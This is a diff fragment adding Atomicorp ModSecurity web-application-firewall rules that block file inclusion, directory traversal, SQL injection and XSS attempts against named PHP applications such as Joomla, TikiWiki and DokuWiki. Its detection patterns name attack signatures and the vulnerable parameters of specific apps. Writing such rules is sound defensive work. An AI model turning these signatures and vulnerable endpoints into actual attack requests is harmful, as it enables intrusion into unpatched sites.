+SecRule ARGS:skindir "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: DokuWiki "TARGET_FN" directory Traversal Vulnerability
+SecRule REQUEST_URI "bin/dwpage\.php" "chain,id:390113,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DokuWiki TARGET_FN directory Traversal Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:TARGET_FN "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: Fantastic News "config[script_path]" File Inclusion Vulnerabilities
+SecRule REQUEST_URI "(?:archive|headlines)\.php" "chain,id:390114,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Fantastic News config[script_path] File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "config\[script_path\]=(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: phpGroupWare Local File Inclusion Vulnerability
+SecRule REQUEST_URI "alendar/inc/class.holidaycalc\.inc\.php" "chain,id:390133,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpGroupWare Local File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "phpgw_info\[user\]\[preferences\]\[common\]\[country\]=\.\./\.\."
+
+
+# Rule 310019: ExBB Italia "exbb[home_path]" File Inclusion Vulnerability
+SecRule REQUEST_URI "modules/userstop/userstop\.php" "chain,id:390134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ExBB Italia exbb[home_path] File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "exbb\[home_path\]=((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Web3news "PHPSECURITYADMIN_path" File Inclusion
+SecRule REQUEST_URI "security/include/_class\.security\.php" "chain,id:390135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Web3news PHPSECURITYADMIN_path File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:PHPSECURITYADMIN_path "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: phpCOIN "_ccfg[_pkg_path_incl]" File Inclusion
+SecRule REQUEST_URI "\.php\?" "chain,id:390136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN _ccfg[_pkg_path_incl] File Inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "_ccfg\[_pkg_path_incl\]=(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: Eazy Cart Multiple Vulnerabilities
+SecRule REQUEST_URI "easycart\.php" "chain,id:390154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart SQL injection'"
+SecRule ARGS:price "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+# Rule 310019: Eazy Cart Multiple Vulnerabilities
+SecRule REQUEST_URI  "easycart\.php" "chain,id:390156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Eazy Cart XSS ATTACK',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS "<[[:space:]]*(script|about|applet|activex|chrome)"
+
+
+# Rule 310019: WebYep "webyep_sIncludePath" File Inclusion Vulnerabilities
+SecRule REQUEST_URI "webyep-system/program/((lib|elements)/|webyep\.php)" "chain,id:390157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebYep webyep_sIncludePath File Inclusion Vulnerabilities'"
+SecRule ARGS:webyep_sIncludePath "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Travelsized CMS "setup_folder" File Inclusion Vulnerability
+SecRule REQUEST_URI "frontpage\.php" "chain,id:390158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Travelsized CMS setup_folder File Inclusion Vulnerabilities'"
+SecRule ARGS:setup_folder "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Videodb "config[pdf_module]" File Inclusion Vulnerability
+#SecRule REQUEST_URI "core/pdf\.php" "chain,id:390159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Videodb File Inclusion Vulnerabilities'"
+#SecRule REQUEST_URI "config\[pdf_module\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: AllMyGuests "_AMGconfig[cfg_serverpath]" File Inclusion
+#SecRule REQUEST_URI "signin\.php" "chain,id:390160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AllMyGuests File Inclusion Vulnerabilities'"
+#SecRule REQUEST_URI "_AMGconfig\[cfg_serverpath\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: OpenBiblio Local File Inclusion and SQL Injection
+SecRule REQUEST_URI "shared/(header|help)\.php" "chain,id:390161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenBiblio File Inclusion Vulnerabilities'"
+SecRule ARGS "(((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)|(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from))"
+
+
+# Rule 310019: BasiliX "BSX_LIBDIR" File Inclusion Vulnerabilities
+SecRule REQUEST_URI "\.php" "chain,id:390162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BasiliX BSX_LIBDIR File Inclusion Vulnerabilities'"
+SecRule ARGS:BSX_LIBDIR "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: PowerPortal "file_name[]" File Inclusion Vulnerability
+#SecRule REQUEST_URI "index\.php" "chain,id:390163,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Powerportal File Inclusion Vulnerabilities'"
+#SecRule REQUEST_URI "file_name\[\].*(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: DeluxeBB "templatefolder" File Inclusion Vulnerability
+SecRule REQUEST_URI "/templates/" "chain,id:390164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DeluxeBB teplatefolder File Inclusion Vulnerabilities'"
+SecRule ARGS:templatefolder "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+#  Rule 390167: amamber exploit
+SecRule REQUEST_URI "/(?:linkpoint|config)\.inc\.php\?config\[root_dir\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" 	"id:390167, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: amamber remote include'"
+
+#LinPHA "maps_type" Local File Inclusion Vulnerability
+SecRule REQUEST_URI "plugins/maps/map\.main\.class\.php"         "chain,id:390170, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LinPHA maps_type Local File Inclusion Vulnerability'"
+SecRule ARGS:maps_type "(?:\.\.|/etc)"
+
+#Mole "viewsource.php" Information Disclosure Vulnerabilities
+SecRule REQUEST_URI "viewsource\.php"         "chain,id:390171, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mole viewsource.php Information Disclosure Vulnerabilities'"
+SecRule ARGS:dirn|ARGS:fname "(?:\.\.|/etc)"
+
+#Index SQL in cat variable
+SecRule REQUEST_URI "index\.php"         "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:390173, rev:3, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: index.php cat SQL injection'"
+SecRule ARGS:cat "(?:\[|\;|\<|\>|\*|\||\'|\&|\$|\!|\?|\#|\[|\]|\{|\}|\:|\'|\"|\]|union(?:\+| )select|wp_users|user_pass ?, ?char)"
+
+#Tikiwiki tiki-graph_formula.php f parameter Function Injection Vulnerability
+SecRule REQUEST_FILENAME "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390174,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php f parameter Function Injection Vulnerability'"
+SecRule ARGS_NAMES "^\s*f\["
+
+#SecRule ARGS_NAMES "^\s*f\[.*\]$"
+
+# Tikiwiki tiki-graph_formula.php link inclusion attempt
+SecRule REQUEST_FILENAME "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390175,rev:2, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php link inclusion attempt'"
+SecRule ARGS:/^\s*[a-z]+$/ "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+# Tikiwiki XSS in remind password field
+SecRule REQUEST_METHOD "POST" "chain,t:none,id:390176,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki lost password XSS'"
+SecRule REQUEST_FILENAME "tiki-remind_password\.php" "chain,t:none,t:lowercase"
+SecRule ARGS:username "!^(:?[a-z0-9\-\_]{1,37})$" "t:none,t:urlDecodeUni,t:lowercase"
+
+
+#Tikiwiki XSS in feastured link
+SecRule REQUEST_URI "tiki-featured_link\.php" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki featured link XSS attempt'"
+SecRule ARGS:type "iframe"
+
+#Tikiwiki listpages mysql password disclosure attempt
+SecRule REQUEST_URI "tiki-listpages\.php" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:393677,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki listpages mysql passwd disclosure attempt'"
+SecRule ARGS:sort_mode "!^(pagename|hits|lastmodif|creator|user|version|comment|flag|versions|links|backlinks|size)_(asc|desc)$"
+
+#Horde Webmail XSS
+SecRule REQUEST_URI "addevent\.php" "chain,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390178,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde Webmail XSS'"
+SecRule ARGS:url "(?:script|iframe)"
+
+#gCards 1.46 SQL
+SecRule REQUEST_URI "getnewsitem\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: gCards 1.46 SQL'"
+SecRule ARGS:newsid "(?:gc_cardusers|union select|\(username|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#Joovili "category" SQL Injection Vulnerability
+SecRule REQUEST_URI "browse\.videos\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390181,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joovili category SQL injection vulnerability'"
+SecRule ARGS:category "(?:joovili_(?:admins|users)|admin_(?:username|password)|id,username,password,email|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#Jokes Site Script "catagorie" SQL Injection Vulnerability
+SecRule REQUEST_URI "jokes\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390182,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Jokes Script catagorie SQL injection vulnerability'"
+SecRule ARGS:catagorie "(?:concat\(|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#WordPress download Monitor Plugin "id" SQL Injection Vulnerability
+SecRule REQUEST_URI "wp-download_monitor/download\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390183,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress download Monitor Plugin id SQL injection vulnerability'"
+SecRule ARGS:id "(?:concat\(|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+#Bits Listing Injection Vulnerability
+SecRule REQUEST_URI "bits_listings\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bits Listing Injection vulnerability'"
+SecRule ARGS:svr_rootPhpStart  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#sendreminders name injection
+SecRule REQUEST_URI "(?:send_reminders|modules)\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390185,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SendReminders Injection vulnerability'"
+SecRule ARGS:name|ARGS:noSet  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#tikiprint injection
+SecRule REQUEST_URI "tikiprint\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiprint page Injection vulnerability'"
+SecRule ARGS:page  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#up.php?my[root]
+SecRule REQUEST_URI "/up\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: up.php my_root Injection vulnerability'"
+SecRule ARGS:my[root]  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#Tikiwiki tiki-graph_formula.php path recursion vulnerability
+SecRule REQUEST_URI "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390188,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php path recursion Vulnerability'"
+SecRule ARGS "\.\./\.\."
+
+#Tikiwiki tiki-read_article.php path recursion vulnerability
+SecRule REQUEST_URI "tiki-(?:read_article|graph_formula)\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390189,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki file access and injection Vulnerability'"
+SecRule ARGS:title "(?:\.\./\.\.|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+#Force download injection
+#force_download.php?file
+SecRule REQUEST_URI "/force_download\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forcedownload file Injection vulnerability'"
+SecRule ARGS:file  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#config.php?path_to_root
+SecRule REQUEST_URI "/config\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Config path_to_root Injection vulnerability'"
+SecRule ARGS:path_to_root  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#search.php?exec
+SecRule REQUEST_URI "/search\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search.php exec Injection vulnerability'"
+SecRule ARGS:exec  "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+#wp-download.php?dl_id SQL injection
+SecRule REQUEST_URI "/wp-download\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390194,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-download SQL injection vulnerability'"
+SecRule ARGS  "wp_users" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:lowercase,t:removeWhiteSpace"
+
+#index.php menu_id SQL injection
+SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: index.php menu_id SQL injection vulnerability'"
+SecRule ARGS:menu_id  "(?:wmp_admin|adminuser|adminpass)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:lowercase,t:removeWhiteSpace"
+
+#class.admin_menu_lms.php?where_framework= injection
+SecRule REQUEST_URI "/class\.admin_menu_lms\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: class.admin_menu_lms.php injection vulnerability'"
+SecRule ARGS:where_framework  "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+#admin_frame.php?ltarget=/../../
+SecRule REQUEST_URI "/admin_frame\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: admin_frame.php ltarget injection vulnerability'"
+SecRule ARGS:ltarget  "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+#admin_frame.php?ltarget=/../../
+SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390199,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FOG Forum injection vulnerability'"
+SecRule ARGS:fog_langyy|ARGS:fog_skin  "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+#Joomla token attack
+#
+SecRule REQUEST_URI "/index\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:390200,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla token exploit'"
+SecRule ARGS:option "com_user" chain
+SecRule ARGS:task "confirmreset" chain
+SecRule ARGS:token "^'$"
+
+#CoAST "sections_file" File Inclusion Vulnerability
+SecRule REQUEST_URI "/header\.php"  "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CoAST sections_file File Inclusion Vulnerability'"
+SecRule ARGS:sections_file "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
+
+#PHP-Lance "catid" SQL Injection Vulnerability
+SecRule REQUEST_URI "/show\.php"  "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Lance catid SQL Injection Vulnerability'"
+SecRule ARGS:catid "'"
+
+#Pro Chat Rooms "gud" SQL Injection Vulnerability
+SecRule REQUEST_URI "profiles/admin\.php"  "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pro Chat Rooms gud SQL Injection Vulnerability'"
+SecRule ARGS:gud "'"
+
+#Joomla injection
+SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:393602,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla option argument illegal character injection'"
+SecRule ARGS:option "(%|\(|\)|\^|\'|\{|\}|\[|\]|\$|;|:|#)"
+
+#Joomla injection
+SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390603,rev:6,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla illegal characters in argument'"
+SecRule ARGS:option "com_content" chain
+SecRule ARGS:view|ARGS:layout "(\%|\(|\)|\^|\'|\`|\{|\}|\[|\]|\$|;|#|,|\*)"
+
+#Joomla positive rule 1
+SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390604,rev:9,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla ARG injection'"
+SecRule ARGS:option "com_content" chain
+SecRule ARGS:print|ARGS:itemId "!(^-?[0-9-]+$|^$|[0-9]+[/|>|\?]$)"
+
+#Joomla positive rule 2
+#SecRule REQUEST_URI "index\.php\?" #"capture,capture,chain,t:none,t:lowercase,id:390605,rev:19,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla id ARG injection',logdata:'%{TX.0}'"
+#SecRule ARGS:option "com_content" chain
+#SecRule ARGS:id "!(^-?[0-9]+$|^-?[0-9]+\:[a-z0-9\-' ]+(&|$)|^$|^(\%|\.|\:|\!|-|\'|_| |\\|[0-9]|\p{L}|[a-z])+$)"  "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
+#SecRule ARGS:id "!(:u(^-?[0-9]+$|^-?[0-9]+\:[a-z0-9\-' ]+(&|$)|^$|^[-\' \p{L}]+$))"  "t:none,t:lowercase"
+
+
+#Joomla positive rule 3
+SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390606,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla ARG injection'"
+SecRule ARGS:option "com_content" chain
+SecRule ARGS:view|ARGS:tmpl|ARGS:layout "!(^[0-9a-z\-\:]+$|^$)"
+
+#Joomla positive rule 4
+#SecRule REQUEST_URI "index\.php\?" #"chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390607,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla page ARG injection'"
+#SecRule ARGS:option "com_content" chain
+#SecRule ARGS:page "!(^-?[0-9\-\.]+$|^$)"
+
+SecRule REQUEST_URI "template_css\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390608,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla template_css ARG injection'"
+SecRule ARGS:w|ARGS:h|ARGS:sw "!(^[0-9\-]+$)"
+
+
+
+# Rule 340075: PHPBB worm sigs
+#SecRule REQUEST_URI "!(tiki-searchindex\.php)" #SecRule ARGS:highlight "(?:\x2527|%2527)"
+#SecRule ARGS:highlight "(?:\x27|%27|\x2527|%2527)"
+
+
+# Rule 390609:Joomla  XSS injection
+# index.php
+# option=com_search area
+SecRule REQUEST_URI "index\.php"          "chain,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:390609,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Joomla ARGS Cross Site Scripting Attack'"
+SecRule ARGS:option "com_search" chain
+SecRule ARGS "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)"
+
+
+# Rule 380009: ATutor Multiple Vulnerabilities
+#SecRule REQUEST_URI "(body_header\.inc|print)\.php\?section.*\x00" #        "id:380009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: ATutor exploit attempt'"
+
+#SecRule REQUEST_URI "^/administrator/index\.php\?option=com_wxparams" #        "id:343869,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_JOOMLA_POSITIVE"
+
+#SecRule REQUEST_URI "/index\.php" # "t:none,t:urlDecodeUni,t:lowercase,chain,id:390610,rev:15,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
+#SecRule ARGS:view "[a-z0-9]." chain
+#SecRule ARGS:format|ARGS:type|ARGS:layout "('|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\!|\|)"
+
+#SecMarker END_JOOMLA_POSITIVE
+
+
+SecRule REQUEST_URI "/index\.php!(type=rss;action=\.xml$)"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:390611,rev:11,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
+SecRule ARGS:id|ARGS:type|ARGS:view "[a-z0-9]." chain
+SecRule ARGS:format|ARGS:type|ARGS:layout "('|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\!|\|)"
+
+#lxlabs SQL injection protection
+SecRule REQUEST_URI "index\.php"  "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:330600,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LXLabs SQL injection attack'"
+SecRule ARGS:frm_clientname "(?:(?:union|select|realpass) |\()"
+
+#block web inspect scans
+SecRule ARGS "^www\.webinspect\.hp\.com"    "t:none,t:urlDecodeUni,t:lowercase,id:330601,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebInspect Scanner Attack'"
+
+#start at 390615
+#SecRule REQUEST_URI "/index\.php" # "t:urlDecodeUni,t:lowercase,chain,id:330602,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
+#SecRule ARGS:view "[a-z0-9]." chain
+#SecRule ARGS:format|ARGS:type|ARGS:layout "/"
+
+SecRule REQUEST_URI "/index\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:330603,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
+SecRule ARGS:id "[a-z0-9]." chain
+SecRule ARGS:format|ARGS:layout "/"
+
+#faq.php?cid='
+SecRule REQUEST_URI "/faq\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:330604,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: faq.php Cid ARG SQL injection'"
+SecRule ARGS:cid "'"
+
+#search_result.php?host_id='
+SecRule REQUEST_URI "/search_?result\.php"  "t:none,t:urlDecodeUni,t:lowercase,chain,id:330605,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search_result.php HOSTid ARG SQL injection'"
+SecRule ARGS:hostid|ARGS:host_id "'"
+
+#Tikiwiki Spam harvester rule
+#/tiki-listpages.php?find=XsAwSPBeY&maxRecords=20&initial=w
